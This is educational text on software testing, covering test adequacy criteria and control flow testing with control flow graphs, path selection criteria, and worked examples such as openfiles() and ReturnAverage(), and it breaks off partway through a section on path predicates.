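This check can be made mechanical. The Python sketch below assumes we already have, for each test case, the set of executed statement (line) numbers and a pass/fail verdict; how those are collected is tool-specific and outside this sketch.

# Check the statement-coverage adequacy criterion for a test suite.
def statement_coverage_adequate(executable_lines, test_results):
    # test_results: list of (covered_lines, passed) pairs, one per test case.
    if not all(passed for _, passed in test_results):
        return False                       # every test must pass
    covered = set().union(*(lines for lines, _ in test_results))
    return executable_lines <= covered     # every executable statement executed

executable = {1, 2, 3, 4}
results = [({1, 2}, True), ({1, 3, 4}, True)]
print(statement_coverage_adequate(executable, results))  # True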

Satisfiability

Sometimes no test suite can satisfy a criterion for a given program. Example: a defensive programming style includes “can’t happen” sanity checks:

if (z < 0) {
    throw new LogicError("z must be positive here!");
}

No test suite can satisfy statement coverage for this program (if it’s correct).

Uses of Adequacy Criteria

Test selection approaches:

• Guidance in devising a thorough test suite. Example: a specification-based criterion may suggest test cases covering representative combinations of values.

• Revealing missing tests. Post hoc analysis: what might I have missed with this test suite?

• Often used in combination. Example: design the test suite from specifications, then use a structural criterion (e.g., coverage of all branches) to highlight missed logic.

Adequacy criteria provide a way to define a notion of “thoroughness” in a test suite

• But they don’t offer guarantees; they are more like design rules to highlight inadequacy.

• Defined in terms of “covering” some information.

• Derived from many sources: specs, code, models, ...

• May be used for selection as well as measurement. With caution! An aid to thoughtful test design, not a substitute.

Overview

Experience suggests that software that has passed a thorough set of systematic tests is likely to be more dependable than software that has been only superficially or haphazardly tested. Surely we should require that each software module or subsystem undergo thorough, systematic testing before being incorporated into the main product. But what do we mean by thorough testing? What is the criterion by which we can judge the adequacy of a suite of tests that a software artifact has passed?

Ideally, we should like an "adequate" test suite to be one that ensures correctness of the product. Unfortunately, that goal is not attainable. The difficulty of proving that some set of test cases is adequate in this sense is equivalent to the difficulty of proving that the program is correct. In other words, we could have "adequate" testing in this sense only if we could establish correctness without any testing at all.

In practice we settle for criteria that identify inadequacies in test suites. For example, if the specification describes different treatment in two cases, but the test suite does not check that the two cases are in fact treated differently, then we may conclude that the test suite is inadequate to guard against faults in the program logic. If no test in the test suite executes a particular program statement, we might similarly conclude that the test suite is inadequate to guard against faults in that statement. We may use a whole set of (in)adequacy criteria, each of which draws on some source of information about the program and imposes a set of obligations that an adequate set of test cases ought to satisfy. If a test suite fails to satisfy some criterion, the obligation that has not been satisfied may provide some useful information about improving the test suite. If a set of test cases satisfies all the obligations by all the criteria, we still do not know definitively that it is a well-designed and effective test suite, but we have at least some evidence of its thoroughness.

Test Specifications and Cases

A test case includes not only input data but also any relevant execution conditions and procedures, and a way of determining whether the program has passed or failed the test on a particular execution. The term input is used in a very broad sense, which may include all kinds of stimuli that contribute to determining program behavior. For example, an interrupt is as much an input as is a file. The pass/fail criterion might be given in the form of expected output, but could also be some other way of determining whether a particular program execution is correct.

A test case specification is a requirement to be satisfied by one or more actual test cases. The distinction between a test case specification and a test case is similar to the distinction between a program specification and a program. A test case specification might be met by several different test cases, and vice versa. Suppose, for example, we are testing a program that sorts a sequence of words. "The input is two or more words" would be a test case specification, while test cases with the input values "alpha beta" and "Milano Paris London" would be two among many test cases satisfying the test case specification. A test case with input "Milano Paris London" would satisfy both the test case specification "the input is two or more words" and the test case specification "the input contains a mix of lower- and upper-case alphabetic characters."

Characteristics of the input are not the only thing that might be mentioned in a test case specification. A complete test case specification includes pass/fail criteria for judging test execution and may include requirements, drawn from any of several sources of information, such as system, program, and module interface specifications; source code or detailed design of the program itself; and records of faults encountered in other software systems.

Test specifications drawn from system, program, and module interface specifications often describe program inputs, but they can just as well specify any observable behavior that could appear in specifications. For example, the specification of a database system might require certain kinds of robust failure recovery in case of power loss, and test specifications might therefore require removing system power at certain critical points in processing. If a specification describes inputs and outputs, a test specification could prescribe aspects of the input, the output, or both. If the specification is modeled as an extended finite state machine, it might require executions corresponding to particular transitions or paths in the state-machine model. The general term for such test specifications is functional testing, although the term black-box testing and more specific terms like specification-based testing and model-based testing are also used.


Testing Terms

While the informal meanings of words like "test" may be adequate for everyday conversation, in this context we must try to use terms in a more precise and consistent manner. Unfortunately, the terms we will need are not always used consistently in the literature, despite the existence of an IEEE standard that defines several of them. The terms we will use are defined as follows.

Test case A test case is a set of inputs, execution conditions, and a pass/fail criterion. (This usage follows the IEEE standard.)

Test case specification A test case specification is a requirement to be satisfied by one or more actual test cases. (This usage follows the IEEE standard.)

Test obligation A test obligation is a partial test case specification, requiring some property deemed important to thorough testing. We use the term obligation to distinguish the requirements imposed by a test adequacy criterion from more complete test case specifications.

Test suite A test suite is a set of test cases. Typically, a method for functional testing is concerned with creating a test suite. A test suite for a program, system, or individual unit may be made up of several test suites for individual modules, subsystems, or features. (This usage follows the IEEE standard.)

Test or test execution We use the term test or test execution to refer to the activity of executing test cases and evaluating their results. When we refer to "a test," we mean execution of a single test case, except where context makes it clear that the reference is to execution of a whole test suite. (The IEEE standard allows this and other definitions.)

Adequacy criterion A test adequacy criterion is a predicate that is true (satisfied) or false (not satisfied) of a 〈program, test suite〉 pair. Usually a test adequacy criterion is expressed in the form of a rule for deriving a set of test obligations from another artifact, such as a program or specification. The adequacy criterion is then satisfied if every test obligation is satisfied by at least one test case in the suite.

Test specifications drawn from program source code require coverage of particular elements in the source code or some model derived from it. For example, we might require a test case that traverses a loop one or more times. The general term for testing based on program structure is structural testing, although the term white-box testing or glass-box testing is sometimes used.

Previously encountered faults can be an important source of information regarding useful test cases. For example, if previous products have encountered failures or security breaches due to buffer overflows, we may formulate test requirements specifically to check handling of inputs that are too large to fit in provided buffers. These fault-based test specifications usually draw also from interface specifications, design models, or source code, but add test requirements that might not have been otherwise considered. A common form of fault-based testing is fault-seeding: purposely inserting faults in source code and then measuring the effectiveness of a test suite in finding the seeded faults, on the theory that a test suite that finds seeded faults is likely also to find other faults.

Test specifications need not fall cleanly into just one of the categories. For example, test specifications drawn from a model of a program might be considered specification- based if the model is produced during program design, or structural if it is derived from the program source code.

Adequacy Criteria

We have already noted that adequacy criteria are just imperfect but useful indicators of inadequacies, so we may not always wish to use them directly to generate test specifications from which actual test cases are drawn. We will use the term test obligation for test specifications imposed by adequacy criteria, to distinguish them from test specifications that are actually used to derive test cases. Thus, the usual situation will be that a set of test cases (a test suite) is created using a set of test specifications, but then the adequacy of that test suite is measured using a different set of test obligations.

We say a test suite satisfies an adequacy criterion if all the tests succeed and if every test obligation in the criterion is satisfied by at least one of the test cases in the test suite. For example, the statement coverage adequacy criterion is satisfied by a particular test suite for a particular program if each executable statement in the program (i.e., excluding comments and declarations) is executed by at least one test case in the test suite. A fault-based adequacy criterion that seeds a certain set of faults would be satisfied if, for each of the seeded faults, there is a test case that passes for the original program but fails for the program with (only) that seeded fault.
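To make the last point concrete, here is a small illustrative C sketch (our own addition, not from the original text): it seeds a single fault into a tiny function and checks whether a given test case distinguishes the original program from the seeded one.

#include <stdio.h>

/* Original function: returns the larger of two integers. */
static int max2(int a, int b) { return a > b ? a : b; }

/* Version with one seeded fault: the comparison is flipped. */
static int max2_seeded(int a, int b) { return a < b ? a : b; }

int main(void) {
    int a = 3, b = 7;
    /* The seeded-fault obligation is satisfied if some test case
       passes on the original program but fails on the seeded one. */
    int original = max2(a, b);        /* 7: the test passes        */
    int seeded   = max2_seeded(a, b); /* 3: the same test now fails */
    printf("%s\n", original != seeded ? "seeded fault detected"
                                      : "seeded fault not detected");
    return 0;
}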

It is quite possible that no test suite will satisfy a particular test adequacy criterion for a particular program. For example, if the program contains statements that can never be executed (perhaps because it is part of a sanity check that can be executed only if some other part of the program is faulty), then no test suite can satisfy the statement coverage criterion. Analogous situations arise regardless of the sources of information used in devising test adequacy criteria. For example, a specification-based criterion may require combinations of conditions drawn from different parts of the specification, but not all combinations may be possible.

One approach to overcoming the problem of unsatisfiable test obligations is to simply exclude any unsatisfiable obligation from a criterion. For example, the statement coverage criterion can be modified to require execution only of statements that can be executed. However, whether a particular statement or program path is executable, whether a particular combination of clauses in a specification is satisfiable, and whether a program with a seeded error actually behaves differently from the original program are all provably undecidable in the general case. Thus, while tools may be of some help in distinguishing feasible from infeasible test obligations, in at least some cases the distinction will be left to fallible human judgment.

If the number of infeasible test obligations is modest, it can be practical to identify each of them, and to ameliorate human fallibility through peer review. If the number of infeasible test obligations is large, it becomes impractical to carefully reason about each to avoid excusing an obligation that is feasible but difficult to satisfy. A common practice is to measure the extent to which a test suite approaches an adequacy criterion. For example, if an adequacy criterion based on control flow paths in a program unit induced 100 distinct test obligations, and a test suite satisfied 85 of those obligations, then we would say that we had reached 85% coverage of the test obligations.

Quantitative measures of test coverage are widely used in industry. They are simple and cheap to calculate, provide some indication of progress toward thorough testing, and project an aura of objectivity. In managing software development, anything that produces a number can be seductive. One must never forget that coverage is a rough proxy measure for the thoroughness and effectiveness of test suites. The danger, as with any proxy measure of some underlying goal, is the temptation to improve the proxy measure in a way that does not actually contribute to the goal. If, for example, 80% coverage of some adequacy criterion is required to declare a work assignment complete, developers under time pressure will almost certainly yield to the temptation to design tests specifically to that criterion, choosing the simplest test cases that achieve the required coverage level. One cannot entirely avoid such distortions, but to the extent possible one should guard against them by ensuring that the ultimate measure of performance is preventing faults from surviving to later stages of development or deployment.

Comparing Criteria

It would be useful to know whether one test adequacy criterion was more effective than another in helping find program faults, and whether its extra effectiveness was worthwhile with respect to the extra effort expended to satisfy it. One can imagine two kinds of answers to such a question, empirical and analytical. An empirical answer would be based on extensive studies of the effectiveness of different approaches to testing in industrial practice, including controlled studies to determine whether the relative effectiveness of different testing methods depends on the kind of software being tested, the kind of organization in which the software is developed and tested, and a myriad of other potential confounding factors. The empirical evidence available falls short of providing such clear-cut answers. An analytical answer to questions of relative effectiveness would describe conditions under which one adequacy criterion is guaranteed to be more effective than another, or describe in statistical terms their relative effectiveness.


Control Flow Testing

4.1 BASIC IDEA

Two kinds of basic statements in a program unit are assignment statements and conditional statements. An assignment statement is explicitly represented by using an assignment symbol, "=", such as x = 2*y;, where x and y are variables. Program conditions are at the core of conditional statements, such as if(), the for() loop, the while() loop, and goto. As an example, in if(x != y), we are testing for the inequality of x and y. In the absence of conditional statements, program instructions are executed in the sequence they appear. The idea of successive execution of instructions gives rise to the concept of control flow in a program unit. Conditional statements alter the default, sequential control flow in a program unit. In fact, even a small number of conditional statements can lead to a complex control flow structure in a program.
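As a minimal illustration (ours, not from the source), the following C fragment mixes the two kinds of statements; the if() alters the otherwise sequential control flow:

#include <stdio.h>

int main(void) {
    int y = 5;
    int x = 2 * y;    /* assignment statement: executed unconditionally */
    if (x != y) {     /* conditional statement: alters sequential flow  */
        printf("x and y are unequal\n");
    } else {
        printf("x and y are equal\n");
    }
    return 0;         /* the two flows merge again here */
}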

Function calls are a mechanism to provide abstraction in program design. A call to a program function leads to control entering the called function. Similarly, when the called function executes its return statement, we say that control exits from the function. Though a function can have many return statements, for simplicity, one can restructure the function to have exactly one return. A program unit can be viewed as having a well-defined entry point and a well-defined exit point. The execution of a sequence of instructions from the entry point to the exit point of a program unit is called a program path. There can be a large, even infinite, number of paths in a program unit. Each program path can be characterized by an input and an expected output. A specific input value causes a specific program path to be executed; it is expected that the program path performs the desired computation, thereby producing the expected output value. Therefore, it may seem natural to execute as many program paths as possible. Mere execution of a large number of paths, at a higher cost, may not be effective in revealing defects. Ideally, one must strive to execute fewer paths for better effectiveness.

(Source: Software Testing and Quality Assurance: Theory and Practice, Kshirasagar Naik and Priyadarshi Tripathy. Copyright © 2008 John Wiley & Sons, Inc.)

The concepts of control flow in computer programs [1], program paths [2], and control flow testing [2–8] have been studied for many decades. Tools are being developed to support control flow testing [9]. Such tools identify paths from a program unit based on a user-defined criterion, generate the corresponding input to execute a selected path, and generate program stubs and drivers to execute the test. Control flow testing is a kind of structural testing, which is performed by programmers to test code written by them. The concept is applied to small units of code, such as a function. Test cases for control flow testing are derived from the source code of a program unit (e.g., a function or method), rather than from the entire program.

Structurally, a path is a sequence of statements in a program unit, whereas, semantically, it is an execution instance of the unit. For a given set of input data, the program unit executes a certain path. For another set of input data, the unit may execute a different path. The main idea in control flow testing is to appropriately select a few paths in a program unit and observe whether or not the selected paths produce the expected outcome. By executing a few paths in a program unit, the programmer tries to assess the behavior of the entire program unit.

4.2 OUTLINE OF CONTROL FLOW TESTING

The overall idea of generating test input data for performing control flow testing is depicted in Figure 4.1. The activities performed, the intermediate results produced by those activities, and programmer preferences in the test generation process are explained below.

Inputs: The source code of a program unit and a set of path selection criteria are the inputs to a process for generating test data. In the following, two examples of path selection criteria are given.

Example. Select paths such that every statement is executed at least once.

Example. Select paths such that every conditional statement, for example, an if() statement, evaluates to true and false at least once on different occasions. A conditional statement may evaluate to true in one path and false in a second path.

Generation of a Control Flow Graph: A control flow graph (CFG) is a detailed graphical representation of a program unit. The idea behind drawing a CFG is to be able to visualize all the paths in a program unit. The process of drawing a CFG from a program unit will be explained in the following section. If the process of test generation is automated, a compiler can be modified to produce a CFG.

Figure 4.1 Process of generating test input data for control flow testing. (The program unit and the path selection criteria are the inputs; the process draws a control flow graph, selects paths, generates test input data, and checks whether the selected paths are feasible, selecting new paths if not; the output is the test input data.)

Selection of Paths: Paths are selected from the CFG to satisfy the path selection criteria, and this is done by considering the structure of the CFG.

Generation of Test Input Data: A path can be executed if and only if a certain instance of the inputs to the program unit causes all the conditional statements along the path to evaluate to true or false as dictated by the control flow. Such a path is called a feasible path. Otherwise, the path is said to be infeasible. It is essential to identify certain values of the inputs from a given path for the path to execute.

Feasibility Test of a Path: The idea behind checking the feasibility of a selected path is to meet the path selection criteria. If some chosen paths are found to be infeasible, then new paths are selected to meet the criteria.

4.3 CONTROL FLOW GRAPH

A CFG is a graphical representation of a program unit. Three symbols are used to construct a CFG, as shown in Figure 4.2. A rectangle represents a sequential computation. A maximal sequential computation can be represented either by a single rectangle or by many rectangles, each corresponding to one statement in the source code.

Figure 4.2 Symbols in a CFG. (A rectangle denotes sequential computation, a diamond denotes a decision point with True and False branches, and a merge point joins branches.)

We label each computation and decision box with a unique integer. The two branches of a decision box are labeled with T and F to represent the true and false evaluations, respectively, of the condition within the box. We will not label a merge node, because one can easily identify the paths in a CFG even without explicitly considering the merge nodes. Moreover, not mentioning the merge nodes in a path will make a path description shorter.

We consider the openfiles() function shown in Figure 4.3 to illustrate the process of drawing a CFG. The function has three statements: an assignment statement int i = 0;, a conditional statement if(), and a return(i) statement. The reader may note that irrespective of the evaluation of the if(), the function performs the same action, namely, null.

#include <stdio.h> /* required for FILE and fopen() */

FILE *fptr1, *fptr2, *fptr3; /* These are global variables. */

int openfiles() {
    /*
    This function tries to open files "file1", "file2", and
    "file3" for read access, and returns the number of files
    successfully opened. The file pointers of the opened files
    are put in the global variables.
    */
    int i = 0;
    if ((((fptr1 = fopen("file1", "r")) != NULL) && (i++) && (0)) ||
        (((fptr2 = fopen("file2", "r")) != NULL) && (i++) && (0)) ||
        (((fptr3 = fopen("file3", "r")) != NULL) && (i++)));
    return (i);
}

Figure 4.3 Function to open three files.

Figure 4.4 High-level CFG representation of openfiles(). The three nodes are numbered 1, 2, and 3. (Node 1: i = 0, the entry point; node 2: the if() decision; node 3: return(i), the exit point. Both the T and F branches of node 2 lead to node 3.)

In Figure 4.4, we show a high-level representation of the control flow in openfiles() with three nodes numbered 1, 2, and 3. The flow graph shows just two paths in openfiles().

A closer examination of the condition part of the if() statement reveals that there are not only Boolean and relational operators in the condition part, but also assignment statements. Some examples are given below:

Assignment statements: fptr1 = fopen("file1", "r") and i++
Relational operator: fptr1 != NULL
Boolean operators: && and ||

Execution of the assignment statements in the condition part of the if statement depends upon the component conditions. For example, consider the following component condition in the if part:

((( fptr1 = fopen("file1", "r")) != NULL) && (i++) && (0))

The above condition is executed as follows (a small runnable sketch follows this list):

• Execute the assignment statement fptr1 = fopen("file1", "r").

• Evaluate the relational operation fptr1 != NULL.

• If the relational operation evaluates to false, skip the evaluation of the subsequent condition components (i++) && (0).

• If it evaluates to true, evaluate (i++): the current value of i is used as the truth value of this component, and i is incremented as a side effect.

• If (i++) has evaluated to true, the condition (0) is evaluated; otherwise, evaluation of (0) is skipped.
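To see these rules in action, here is a small self-contained C sketch (an illustrative addition; the fopen() calls of Figure 4.3 are replaced by stubbed existence flags f1, f2, and f3, names of our own choosing) that reproduces the short-circuit evaluation and the side effects on i:

#include <stdio.h>

/* Stubbed version of openfiles(): the three flags simulate whether
   file1, file2, and file3 exist, replacing the fopen() calls. */
static int openfiles_stub(int f1, int f2, int f3) {
    int i = 0;
    if ((f1 && (i++) && 0) ||
        (f2 && (i++) && 0) ||
        (f3 && (i++)))
        ;  /* the same null action on both branches, as in Figure 4.3 */
    return i;
}

int main(void) {
    /* i counts the files that "opened", thanks to the i++ side effects */
    printf("%d\n", openfiles_stub(1, 1, 1)); /* prints 3 */
    printf("%d\n", openfiles_stub(1, 0, 0)); /* prints 1 */
    printf("%d\n", openfiles_stub(0, 1, 1)); /* prints 2 */
    return 0;
}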

In Figure 4.5, we show a detailed CFG for the openfiles() function. The figure illustrates the fact that a CFG can take on a complex structure even for a small program unit.

Figure 4.5 Detailed CFG representation of openfiles(). The numbers 1–21 are the nodes. (The detailed graph expands the if() condition of Figure 4.3 into its component assignments, relational tests, and short-circuited Boolean operations.)

We give a Java method, called ReturnAverage(), in Figure 4.6. The method accepts four parameters, namely value, AS, MIN, and MAX, where value is an integer array and AS is the maximum size of the array. The array can hold fewer elements than AS; such a scenario is semantically represented by having the value -999 denote the end of the array. For example, suppose AS = 15, whereas the 10th element of the array is -999; this means that there are 10 elements, 0–9, in the array. MIN and MAX are two integer values that are used to perform certain computations within the method. The method sums up the values of all those elements of the array which fall within the closed range [MIN, MAX], counts their number, and returns their average value. The CFG of the method is shown in Figure 4.7.

public static double ReturnAverage(int value[], int AS, int MIN, int MAX) {
    /*
    Function: ReturnAverage
    Computes the average of all those numbers in the input array in
    the positive range [MIN, MAX]. The maximum size of the array is AS.
    But the array size could be smaller than AS, in which case the end
    of input is represented by -999.
    */
    int i, ti, tv, sum;
    double av;
    i = 0; ti = 0; tv = 0; sum = 0;
    while (ti < AS && value[i] != -999) {
        ti++;
        if (value[i] >= MIN && value[i] <= MAX) {
            tv++;
            sum = sum + value[i];
        }
        i++;
    }
    if (tv > 0)
        av = (double)sum / tv;
    else
        av = (double)-999;
    return (av);
}

Figure 4.6 Function to compute average of selected integers in an array. This program is an adaptation of "Figure 2. A sample program" in ref. 10. (With permission from the Australian Computer Society.)

Figure 4.7 A CFG representation of ReturnAverage(). Numbers 1–13 are the nodes. (Node 1 initializes value[], AS, MIN, MAX; node 2 performs i = 0, ti = 0, tv = 0, sum = 0; node 3 tests ti < AS; node 4 tests value[i] != -999; node 5 is ti++; nodes 6 and 7 test value[i] >= MIN and value[i] <= MAX; node 8 performs tv++ and sum = sum + value[i]; node 9 is i++; node 10 tests tv > 0; nodes 11 and 12 compute av = (double)-999 and av = (double)sum/tv, respectively; node 13 is return(av).)

4.4 PATHS IN A CONTROL FLOW GRAPH

We assume that a control flow graph has exactly one entry node and exactly one exit node for the convenience of discussion. Each node is labeled with a unique integer value. Also, the two branches of a decision node are appropriately labeled with true (T) or false (F). We are interested in identifying entry–exit paths in a CFG. A path is represented as a sequence of computation and decision nodes from the entry node to the exit node. We also specify whether control exits a decision node via its true or false branch while including it in a path.

In Table 4.1, we show a few paths from the control flow graph of Figure 4.7. The reader may note that we have arbitrarily chosen these paths without applying any path selection criterion. We have unfolded the loop just once in path 3, whereas path 4 unfolds the same loop twice, and these are two distinct paths.

TABLE 4.1 Examples of Paths in the CFG of Figure 4.7

Path 1: 1-2-3(F)-10(T)-12-13
Path 2: 1-2-3(F)-10(F)-11-13
Path 3: 1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13
Path 4: 1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13

4.5 PATH SELECTION CRITERIA

A CFG, such as the one shown in Figure 4.7, can have a large number of different paths. One may be tempted to test the execution of each and every path in a program unit. For a program unit with a small number of paths, executing all the paths may be desirable and achievable as well. On the other hand, for a program unit with a large number of paths, executing every distinct path may not be practical. Thus, it is more productive for programmers to select a small number of program paths in an effort to reveal defects in the code. Given the set of all paths, one is faced with the question "What paths do I select for testing?" The concept of path selection criteria is useful in answering this question. In the following, we state the advantages of selecting paths based on defined criteria:

• All program constructs are exercised at least once. The programmer needs to observe the outcome of executing each program construct, for example, statements, Boolean conditions, and returns.

• We do not generate test inputs which execute the same path repeatedly. Executing the same path several times is a waste of resources. However, if each execution of a program path potentially updates the state of the system, for example, the database state, then multiple executions of the same path may not be identical.

• We know the program features that have been tested and those not tested. For example, we may execute an if statement only once so that it evaluates to true. If we do not execute it once again for its false evaluation, we are, at least, aware that we have not observed the outcome of the program with a false evaluation of the if statement.

Now we explain the following well-known path selection criteria:

• Select all paths.

• Select paths to achieve complete statement coverage.

• Select paths to achieve complete branch coverage.

• Select paths to achieve predicate coverage.

4.5.1 All-Path Coverage Criterion

If all the paths in a CFG are selected, then one can detect all faults, except those due to missing path errors. However, a program may contain a large number of paths, or even an infinite number of paths. The small, loop-free openfiles() function shown in Figure 4.3 contains more than 25 paths, though only eight of all those paths are feasible; one does not know whether or not a path is feasible at the time of selecting paths. If one selects all possible paths in a program, then we say that the all-path selection criterion has been satisfied.

Let us consider the example of the openfiles() function. This function tries to open the three files file1, file2, and file3. The function returns an integer representing the number of files it has successfully opened. A file is said to be successfully opened with "read" access if the file exists. The existence of a file is either "yes" or "no." Thus, the input domain of the function consists of eight combinations of the existence of the three files, as shown in Table 4.2.

We can trace a path in the CFG of Figure 4.5 for each input, that is, each row of Table 4.2. Ideally, we identify test inputs to execute a certain path in a program; this will be explained later in this chapter. We give three examples of the paths executed by the test inputs (Table 4.3). In this manner, we can identify eight possible paths in Figure 4.5. The all-paths selection criterion is desirable since it can detect faults; however, it is difficult to achieve in practice.

TABLE 4.2 Input Domain of openfiles()

Existence of file1   Existence of file2   Existence of file3
No                   No                   No
No                   No                   Yes
No                   Yes                  No
No                   Yes                  Yes
Yes                  No                   No
Yes                  No                   Yes
Yes                  Yes                  No
Yes                  Yes                  Yes

TABLE 4.3 Inputs and Paths in openfiles()

Input             Path
<No, No, No>      1-2-3(F)-8-9(F)-14-15(F)-19-21
<Yes, No, No>     1-2-3(T)-4(F)-6-8-9(F)-14-15(F)-19-21
<Yes, Yes, Yes>   1-2-3(T)-4(F)-6-8-9(T)-10(T)-11-13(F)-14-15(T)-16(T)-18-20-21

4.5.2 Statement Coverage Criterion

Statement coverage refers to executing individual program statements and observing the outcome. We say that 100% statement coverage has been achieved if all the statements have been executed at least once. Complete statement coverage is the weakest coverage criterion in program testing. Any test suite that achieves less than complete statement coverage for new software is considered to be unacceptable.

All program statements are represented in some form in a CFG. Referring to the ReturnAverage() method in Figure 4.6 and its CFG in Figure 4.7, the four assignment statements

i = 0;

ti = 0;

tv = 0;

sum = 0;

have been represented by node 2. The while statement has been represented as a loop, where the loop control condition

(ti < AS && value[i] != -999)

has been represented by nodes 3 and 4. Thus, covering a statement in a program means visiting one or more nodes representing the statement, more precisely, selecting a feasible entry–exit path that includes the corresponding nodes. Since a single entry–exit path includes many nodes, we need to select just a few paths to cover all the nodes of a CFG. Therefore, the basic problem is to select a few feasible paths to cover all the nodes of a CFG in order to achieve the complete statement coverage criterion. We follow these rules while selecting paths:

• Select short paths.

• Select paths of increasingly longer length. Unfold a loop several times if there is a need.

• Select arbitrarily long, "complex" paths.

One can select the two paths shown in Table 4.4 to achieve complete statement coverage.

4.5.3 Branch Coverage Criterion

Syntactically, a branch is an outgoing edge from a node. All the rectangle nodes have at most one outgoing branch (edge). The exit node of a CFG does not have an outgoing branch. All the diamond nodes have two outgoing branches. Covering a branch means selecting a path that includes the branch. Complete branch coverage means selecting a number of paths such that every branch is included in at least one path.

In a preceding discussion, we showed that one can select two paths, SCPath 1 and SCPath 2 in Table 4.4, to achieve complete statement coverage. These two paths cover all the nodes (statements) and most of the branches of the CFG shown in Figure 4.7. The branches which are not covered by these two paths have been highlighted by bold dashed lines in Figure 4.8. These uncovered branches correspond to the three independent conditions

value[i] != -999

value[i] >= MIN

value[i] <= MAX

evaluating to false. This means that as a programmer we have not observed the outcome of the program execution as a result of the conditions evaluating to false. Thus, complete branch coverage means selecting enough paths such that every condition evaluates to true at least once and to false at least once.

We need to select more paths to cover the branches highlighted by the bold dashed lines in Figure 4.8. A set of paths for complete branch coverage is given in Table 4.5.

TABLE 4.4 Paths for Statement Coverage of CFG of Figure 4.7

SCPath 1: 1-2-3(F)-10(F)-11-13
SCPath 2: 1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13

Figure 4.8 The CFG of Figure 4.7, with dashed arrows representing the branches not covered by the statement-covering paths of Table 4.4, namely the false branches of nodes 4, 6, and 7.

TABLE 4.5 Paths for Branch Coverage of CFG of Figure 4.7

BCPath 1: 1-2-3(F)-10(F)-11-13
BCPath 2: 1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13
BCPath 3: 1-2-3(T)-4(F)-10(F)-11-13
BCPath 4: 1-2-3(T)-4(T)-5-6(F)-9-3(F)-10(F)-11-13
BCPath 5: 1-2-3(T)-4(T)-5-6(T)-7(F)-9-3(F)-10(F)-11-13


4.5.4 Predicate Coverage Criterion

We refer to the partial CFG of Figure 4.9a to explain the concept of predicate coverage. OB1, OB2, OB3, and OB are four Boolean variables. The program computes the values of the individual variables OB1, OB2, and OB3; details of their computation are irrelevant to our discussion and have been omitted. Next, OB is computed as shown in the CFG. The CFG checks the value of OB and executes either OBlock1 or OBlock2 depending on whether OB evaluates to true or false, respectively.

We need to design just two test cases to achieve both statement coverage and branch coverage. We select inputs such that the four Boolean conditions in Figure 4.9a evaluate to the values shown in Table 4.6. The reader may note that we have shown just one way of forcing OB to true. If we select inputs so that these two cases hold, then we do not observe the effect of the computations taking place in nodes 2 and 3. There may be faults in the computation parts of nodes 2 and 3 such that OB2 and OB3 always evaluate to false.

Figure 4.9 Partial CFG with (a) OR operation and (b) AND operation. (In part (a), nodes 1–3 compute OB1, OB2, and OB3, node 4 computes OB = OB1 || OB2 || OB3, and decision node 5 tests if(OB), leading to OBlock1 on the true branch and OBlock2 on the false branch. Part (b) is analogous: AB = AB1 && AB2 && AB3 is computed, and if(AB) leads to ABlock1 or ABlock2.)

TABLE 4.6 Two Cases for Complete Statement and Branch Coverage of CFG of Figure 4.9a

Case   OB1   OB2   OB3   OB
1      T     F     F     T
2      F     F     F     F

Therefore, there is a need to design test cases such that a path is executed under all possible conditions. The false branch of node 5 (Figure 4.9a) is executed under exactly one condition, namely, when OB1 = False, OB2 = False, and OB3 = False, whereas the true branch executes under seven conditions. If all possible combinations of truth values of the conditions affecting a selected path have been explored under some tests, then we say that predicate coverage has been achieved. Therefore, the path taking the true branch of node 5 in Figure 4.9a must be executed for all seven possible combinations of truth values of OB1, OB2, and OB3 which result in OB = True.

A similar situation holds for the partial CFG shown in Figure 4.9b, where AB1, AB2, AB3, and AB are Boolean variables.
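As a quick illustration (our own addition, not from the source), the following C snippet enumerates the truth-value combinations of OB1, OB2, and OB3 and confirms that exactly seven of them force OB, and hence the true branch of node 5, to true:

#include <stdio.h>

/* Enumerate all combinations of OB1, OB2, OB3 and report those
   that make OB = OB1 || OB2 || OB3 true. Predicate coverage of the
   true branch of if(OB) requires exercising all such combinations. */
int main(void) {
    int count = 0;
    for (int ob1 = 0; ob1 <= 1; ob1++)
        for (int ob2 = 0; ob2 <= 1; ob2++)
            for (int ob3 = 0; ob3 <= 1; ob3++) {
                int ob = ob1 || ob2 || ob3;
                if (ob) {
                    count++;
                    printf("OB1=%d OB2=%d OB3=%d -> OB=1\n", ob1, ob2, ob3);
                }
            }
    printf("%d combinations force the true branch\n", count); /* prints 7 */
    return 0;
}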

4.6 GENERATING TEST INPUT

In Section 4.5 we explained the concept of path selection criteria to cover certain aspects of a program with a set of paths. The program aspects we considered were all statements, true and false evaluations of each condition, and combinations of conditions affecting execution of a path. Now, having identified a path, the question is how to select input values such that when the program is executed with the selected inputs, the chosen paths get executed. In other words, we need to identify inputs to force the execution of the paths. In the following, we define a few terms and give an example of generating test inputs for a selected path.

1. Input Vector: An input vector is a collection of all data entities read by the routine whose values must be fixed prior to entering the routine. Members of an input vector of a routine can take different forms, as listed below:

• Input arguments to a routine

• Global variables and constants

• Files

• Contents of registers in assembly language programming

• Network connections

• Timers

A file is a complex input element. In one case, the mere existence of a file can be considered as an input, whereas in another case, the contents of the file are considered to be inputs. Thus, the idea of an input vector is more general than the concept of input arguments of a function.

Example. An input vector for openfiles() (Figure 4.3) consists of the individual presence or absence of the files file1, file2, and file3.

Example. The input vector of the ReturnAverage() method shown in Figure 4.6 is <value[], AS, MIN, MAX>.

2. Predicate: A predicate is a logical function evaluated at a decision point.

Example. The construct ti < AS is the predicate in decision node 3 of Figure 4.7.

Example. The construct OB is the predicate in decision node 5 of Figure 4.9.

3. Path Predicate: A path predicate is the set of predicates associated with a path.

The path in Figure 4.10 indicates that nodes 3, 4, 6, 7, and 10 are decision nodes. The predicate associated with node 3 appears twice in the path; in the first instance it evaluates to true and in the second instance it evaluates to false. The path predicate associated with the path under consideration is shown in Figure 4.11.

We also specify the intended evaluation of the component predicates as found in the path specification. For instance, we specify that value[i] != -999 must evaluate to true in the path predicate shown in Figure 4.11. We keep this additional information for the following two reasons:

• In the absence of this additional information denoting the intended evaluation of a predicate, we will have no way to distinguish between the two instances of the predicate ti < AS, namely 3(T) and 3(F), associated with node 3.

1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13

Figure 4.10 Example of a path from Figure 4.7.

ti < AS ≡ True
